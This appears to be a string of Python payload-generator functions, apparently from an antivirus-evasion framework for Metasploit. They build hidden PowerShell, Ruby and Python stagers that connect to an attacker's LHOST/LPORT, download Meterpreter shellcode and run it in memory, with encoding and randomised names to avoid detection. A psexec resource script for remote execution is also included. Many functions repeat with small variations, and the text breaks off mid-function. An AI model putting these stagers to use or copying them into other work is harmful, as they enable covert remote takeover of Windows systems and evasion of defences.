def generate(self):
baseString = """$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
"@
try{$s = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)
$s.Connect('%s', %s) | out-null; $p = [Array]::CreateInstance("byte", 4); $x = $s.Receive($p) | out-null; $z = 0
$y = [Array]::CreateInstance("byte", [BitConverter]::ToInt32($p,0)+5); $y[0] = 0xBF
while ($z -lt [BitConverter]::ToInt32($p,0)) { $z += $s.Receive($y,$z+5,32,[System.Net.Sockets.SocketFlags]::None) }
for ($i=1; $i -le 4; $i++) {$y[$i] = [System.BitConverter]::GetBytes([int]$s.Handle)[$i-1]}
$t = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru; $x=$t::VirtualAlloc(0,$y.Length,0x3000,0x40)
[System.Runtime.InteropServices.Marshal]::Copy($y, 0, [IntPtr]($x.ToInt32()), $y.Length)
$t::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %(self.required_options["LHOST"][0], self.required_options["LPORT"][0])
print baseString
encoded = helpers.deflate(baseString)
payloadCode = "@echo off\n"
payloadCode = "if %PROCESSOR_ARCHITECTURE%==x86 ("
payloadCode += "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\"" % (encoded)
payloadCode += ") else ("
payloadCode += "%%WinDir%%\\syswow64\\windowspowershell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\")" % (encoded)
return payloadCode
def generate(self):
baseString = """$c = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);
"@
try{$s = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)
$s.Connect('%s', %s) | out-null; $p = [Array]::CreateInstance("byte", 4); $x = $s.Receive($p) | out-null; $z = 0
$y = [Array]::CreateInstance("byte", [BitConverter]::ToInt32($p,0)+5); $y[0] = 0xBF
while ($z -lt [BitConverter]::ToInt32($p,0)) { $z += $s.Receive($y,$z+5,1,[System.Net.Sockets.SocketFlags]::None) }
for ($i=1; $i -le 4; $i++) {$y[$i] = [System.BitConverter]::GetBytes([int]$s.Handle)[$i-1]}
$t = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru; $x=$t::VirtualAlloc(0,$y.Length,0x3000,0x40)
[System.Runtime.InteropServices.Marshal]::Copy($y, 0, [IntPtr]($x.ToInt32()), $y.Length)
$t::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" % (
self.required_options["LHOST"][0],
self.required_options["LPORT"][0])
print baseString
encoded = helpers.deflate(baseString)
payloadCode = "@echo off\n"
payloadCode += "if %PROCESSOR_ARCHITECTURE%==x86 ("
payloadCode += "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\"" % (
encoded)
payloadCode += ") else ("
payloadCode += "%%WinDir%%\\syswow64\\windowspowershell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\")" % (
encoded)
return payloadCode
def generate(self):
proxyString = "$pr = [System.Net.WebRequest]::GetSystemWebProxy();$pr.Credentials=[System.Net.CredentialCache]::DefaultCredentials;$m.proxy=$pr;$m.UseDefaultCredentials=$true;"
baseString = """$q = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@
try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()
function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum %% 0x100 -eq 92)}
function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}
function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}
function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e; foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$m = New-Object System.Net.WebClient;%s
$m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)");$n = g; [Byte[]] $p = $m.DownloadData("https://%s:%s/$n" )
$o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)
$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %("" if self.required_options["PROXY"][0] == "N" else proxyString,
self.required_options["LHOST"][0], self.required_options["LPORT"][0])
encoded = helpers.deflate(baseString)
payloadCode = "@echo off\n"
payloadCode += "if %PROCESSOR_ARCHITECTURE%==x86 ("
payloadCode += "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\"" % (encoded)
payloadCode += ") else ("
payloadCode += "%%WinDir%%\\syswow64\\windowspowershell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\")" % (encoded)
return payloadCode
def generate(self):
proxyString = "$pr = [System.Net.WebRequest]::GetSystemWebProxy();$pr.Credentials=[System.Net.CredentialCache]::DefaultCredentials;$m.proxy=$pr;$m.UseDefaultCredentials=$true;"
baseString = """$q = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@
try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()
function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum %% 0x100 -eq 92)}
function t {$f = "";1..%i|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}
function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}
function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e; foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}
$m = New-Object System.Net.WebClient;%s$m.Headers.Add("user-agent", "%s")
$n = g; [Byte[]] $p = $m.DownloadData("http://%s:%s/%s$n" )
$o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru
$x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)
$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}""" %((int(self.required_options["STAGERURILENGTH"][0])-1),
"" if self.required_options["PROXY"][0] == "N" else proxyString,
self.required_options["USER_AGENT"][0],
self.required_options["LHOST"][0],
self.required_options["LPORT"][0],
"" if self.required_options["LURI"][0] == "/" else "%s/" % self.required_options["LURI"][0])
encoded = helpers.deflate(baseString)
payloadCode = "@echo off\n"
payloadCode += "if %PROCESSOR_ARCHITECTURE%==x86 ("
payloadCode += "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\"" % (encoded)
payloadCode += ") else ("
payloadCode += "%%WinDir%%\\syswow64\\windowspowershell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\")" % (encoded)
return payloadCode
def generate(self):
# get the main meterpreter .dll with the header/loader patched
meterpreterDll = patch.headerPatch()
# turn on SSL
meterpreterDll = patch.patchTransport(meterpreterDll, True)
# replace the URL
urlString = "https://" + self.required_options['LHOST'][0] + ":" + str(
self.required_options['LPORT']
[0]) + "/" + helpers.genHTTPChecksum() + "/\x00"
meterpreterDll = patch.patchURL(meterpreterDll, urlString)
# replace in the UA
meterpreterDll = patch.patchUA(
meterpreterDll,
"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00")
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
payloadCode = "require 'rubygems';require 'win32/api';require 'socket';require 'base64';require 'zlib';include Win32\n"
payloadCode += "exit if Object.const_defined?(:Ocra)\n"
# randomly generate out variable names
payloadName = helpers.randomString().lower()
ptrName = helpers.randomString().lower()
threadName = helpers.randomString().lower()
Shellcode = helpers.randomString().lower()
randInflateFuncName = helpers.randomString().lower()
randb64stringName = helpers.randomString().lower()
randVarName = helpers.randomString().lower()
# deflate function
payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + ")\n"
payloadCode += " " + randVarName + " = Base64.decode64(" + randb64stringName + ")\n"
payloadCode += " zstream = Zlib::Inflate.new(-Zlib::MAX_WBITS)\n"
payloadCode += " buf = zstream.inflate(" + randVarName + ")\n"
payloadCode += " zstream.finish\n"
payloadCode += " zstream.close\n"
payloadCode += " return buf\n"
payloadCode += "end\n\n"
payloadCode += Shellcode + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
payloadCode += "v = API.new('VirtualAlloc', 'IIII', 'I');r = API.new('RtlMoveMemory', 'IPI', 'V');c = API.new('CreateThread', 'IIIIIP', 'I');w = API.new('WaitForSingleObject', 'II', 'I')\n"
payloadCode += "%s = %s\n" % (payloadName, Shellcode)
payloadCode += "%s = v.call(0,(%s.length > 0x1000 ? %s.length : 0x1000), 0x1000, 0x40)\n" % (
ptrName, payloadName, payloadName)
payloadCode += "x = r.call(%s,%s,%s.length); %s = c.call(0,0,%s,0,0,0); x = w.call(%s,0xFFFFFFF)\n" % (
ptrName, payloadName, payloadName, threadName, ptrName, threadName)
#if self.required_options["USE_CRYPTER"][0].lower() == "y":
# payloadCode = encryption.rubyCrypter(payloadCode)
return payloadCode
def generate(self):
encoded = helpers.deflate(self.psRaw())
payloadCode = "@echo off\n"
payloadCode = "if %PROCESSOR_ARCHITECTURE%==x86 ("
payloadCode += "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\"" % (encoded)
payloadCode += ") else ("
payloadCode += "%%WinDir%%\\syswow64\\windowspowershell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\")" % (encoded)
return payloadCode
def generate(self):
encoded = helpers.deflate(self.psRaw())
payloadCode = "@echo off\n"
payloadCode += "if %PROCESSOR_ARCHITECTURE%==x86 ("
payloadCode += "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\"" % (encoded)
payloadCode += ") else ("
payloadCode += "%%WinDir%%\\syswow64\\windowspowershell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\")" % (encoded)
return payloadCode
def generate(self):
# get the main meterpreter .dll with the header/loader patched
meterpreterDll = patch.headerPatch()
# turn on SSL
meterpreterDll = patch.patchTransport(meterpreterDll, False)
# replace the URL
urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + helpers.genHTTPChecksum() + "/\x00"
meterpreterDll = patch.patchURL(meterpreterDll, urlString)
# replace in the UA
meterpreterDll = patch.patchUA(meterpreterDll, "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00")
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
payloadCode = "require 'rubygems';require 'win32/api';require 'socket';require 'base64';require 'zlib';include Win32\n"
payloadCode += "exit if Object.const_defined?(:Ocra)\n"
# randomly generate out variable names
payloadName = helpers.randomString().lower()
ptrName = helpers.randomString().lower()
threadName = helpers.randomString().lower()
Shellcode = helpers.randomString().lower()
randInflateFuncName = helpers.randomString().lower()
randb64stringName = helpers.randomString().lower()
randVarName = helpers.randomString().lower()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+")\n"
payloadCode += " " + randVarName + " = Base64.decode64("+randb64stringName+")\n"
payloadCode += " zstream = Zlib::Inflate.new(-Zlib::MAX_WBITS)\n"
payloadCode += " buf = zstream.inflate("+ randVarName +")\n"
payloadCode += " zstream.finish\n"
payloadCode += " zstream.close\n"
payloadCode += " return buf\n"
payloadCode += "end\n\n"
payloadCode += Shellcode + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
payloadCode += "v = API.new('VirtualAlloc', 'IIII', 'I');r = API.new('RtlMoveMemory', 'IPI', 'V');c = API.new('CreateThread', 'IIIIIP', 'I');w = API.new('WaitForSingleObject', 'II', 'I')\n"
payloadCode += "%s = %s\n" %(payloadName, Shellcode)
payloadCode += "%s = v.call(0,(%s.length > 0x1000 ? %s.length : 0x1000), 0x1000, 0x40)\n" %(ptrName,payloadName,payloadName)
payloadCode += "x = r.call(%s,%s,%s.length); %s = c.call(0,0,%s,0,0,0); x = w.call(%s,0xFFFFFFF)\n" %(ptrName,payloadName,payloadName,threadName,ptrName,threadName)
if self.required_options["USE_CRYPTER"][0].lower() == "y":
payloadCode = encryption.rubyCrypter(payloadCode)
return payloadCode
def generate(self):
encoded = helpers.deflate(self.psRaw())
rcScript = "use auxiliary/admin/smb/psexec_command\n"
rcScript += "set COMMAND "
rcScript += "if %PROCESSOR_ARCHITECTURE%==x86 ("
rcScript += "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \\\"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\\\\\"%s\\\\\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\\\"" % (encoded)
rcScript += ") else ("
rcScript += "%%WinDir%%\\\\syswow64\\\\windowspowershell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \\\"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\\\\\"%s\\\\\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\\\")" % (encoded)
return rcScript
def generate(self):
encoded = helpers.deflate(self.psRaw())
rcScript = "use auxiliary/admin/smb/psexec_command\n"
rcScript += "set COMMAND "
rcScript += "if %PROCESSOR_ARCHITECTURE%==x86 ("
rcScript += "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \\\"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\\\\\"%s\\\\\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\\\"" % (
encoded)
rcScript += ") else ("
rcScript += "%%WinDir%%\\\\syswow64\\\\windowspowershell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \\\"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\\\\\"%s\\\\\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\\\")" % (
encoded)
return rcScript
def generate(self):
if os.path.exists(settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"):
metsrvPath = settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"
else:
print "[*] Error: You either do not have the latest version of Metasploit or"
print "[*] Error: do not have your METASPLOIT_PATH set correctly in your settings file."
print "[*] Error: Please fix either issue then select this payload again!"
sys.exit()
f = open(metsrvPath, 'rb')
meterpreterDll = f.read()
f.close()
# lambda function used for patching the metsvc.dll
dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]
# patch the metsrv.dll header
headerPatch = helpers.selfcontained_patch()
meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)
# patch in the default user agent string
userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)
# turn off SSL
sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
sslString = "METERPRETER_TRANSPORT_HTTP\x00"
meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)
# replace the URL/port of the handler
urlIndex = meterpreterDll.index("https://" + ("X" * 256))
urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00"
meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
# replace the expiration timeout with the default value of 300
expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
expirationTimeout = struct.pack('<I', 604800)
meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)
# replace the communication timeout with the default value of 300
communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
communicationTimeout = struct.pack('<I', 300)
meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
# traditional void pointer injection
if self.required_options["inject_method"][0].lower() == "void":
# doing void * cast
payloadCode += "from ctypes import *\nimport base64,zlib\n"
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
randVarName = helpers.randomString()
randFuncName = helpers.randomString()
payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
payloadCode += randFuncName+"()\n"
# VirtualAlloc() injection
else:
payloadCode += 'import ctypes,base64,zlib\n'
randInflateFuncName = helpers.randomString()
randb64stringName = helpers.randomString()
randVarName = helpers.randomString()
randPtr = helpers.randomString()
randBuf = helpers.randomString()
randHt = helpers.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
payloadCode = encryption.pyherion(payloadCode)
return payloadCode
def generate(self):
metsrvPath = veil.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"
f = open(metsrvPath, 'rb')
meterpreterDll = f.read()
f.close()
# lambda function used for patching the metsvc.dll
dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]
# patch the metsrv.dll header
headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\x37"
headerPatch += "\x15\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)
# patch in the default user agent string
userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)
# turn off SSL
sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
sslString = "METERPRETER_TRANSPORT_HTTP\x00"
meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)
# replace the URL/port of the handler
urlIndex = meterpreterDll.index("https://" + ("X" * 256))
urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + randomizer.randomString(16) + "/\x00"
meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
# replace the expiration timeout with the default value of 300
expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
expirationTimeout = struct.pack('<I', 604800)
meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)
# replace the communication timeout with the default value of 300
communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
communicationTimeout = struct.pack('<I', 300)
meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
# doing void * cast
payloadCode += "from ctypes import *\nimport base64,zlib\n"
randInflateFuncName = randomizer.randomString()
randb64stringName = randomizer.randomString()
randVarName = randomizer.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
randVarName = randomizer.randomString()
randFuncName = randomizer.randomString()
payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
payloadCode += randFuncName+"()\n"
if self.required_options["use_encrypter"][0].lower() == "y":
payloadCode = crypters.pyherion(payloadCode)
return payloadCode
def generate(self):
if os.path.exists(settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"):
metsrvPath = settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"
else:
print "[*] Error: You either do not have the latest version of Metasploit or"
print "[*] Error: do not have your METASPLOIT_PATH set correctly in your settings file."
print "[*] Error: Please fix either issue then select this payload again!"
sys.exit()
f = open(metsrvPath, 'rb')
meterpreterDll = f.read()
f.close()
# lambda function used for patching the metsvc.dll
dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]
# patch the metsrv.dll header
headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\xf8"
headerPatch += "\x87\x05\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)
# patch in the default user agent string
userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)
# turn off SSL
sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
sslString = "METERPRETER_TRANSPORT_HTTP\x00"
meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)
# replace the URL/port of the handler
urlIndex = meterpreterDll.index("https://" + ("X" * 256))
urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00"
meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
# replace the expiration timeout with the default value of 300
expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
expirationTimeout = struct.pack('<I', 604800)
meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)
# replace the communication timeout with the default value of 300
communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
communicationTimeout = struct.pack('<I', 300)
meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
payloadCode = "require 'rubygems';require 'win32/api';require 'socket';require 'base64';require 'zlib';include Win32\n"
payloadCode += "exit if Object.const_defined?(:Ocra)\n"
# randomly generate out variable names
payloadName = helpers.randomString().lower()
ptrName = helpers.randomString().lower()
threadName = helpers.randomString().lower()
Shellcode = helpers.randomString().lower()
randInflateFuncName = helpers.randomString().lower()
randb64stringName = helpers.randomString().lower()
randVarName = helpers.randomString().lower()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+")\n"
payloadCode += " " + randVarName + " = Base64.decode64("+randb64stringName+")\n"
payloadCode += " zstream = Zlib::Inflate.new(-Zlib::MAX_WBITS)\n"
payloadCode += " buf = zstream.inflate("+ randVarName +")\n"
payloadCode += " zstream.finish\n"
payloadCode += " zstream.close\n"
payloadCode += " return buf\n"
payloadCode += "end\n\n"
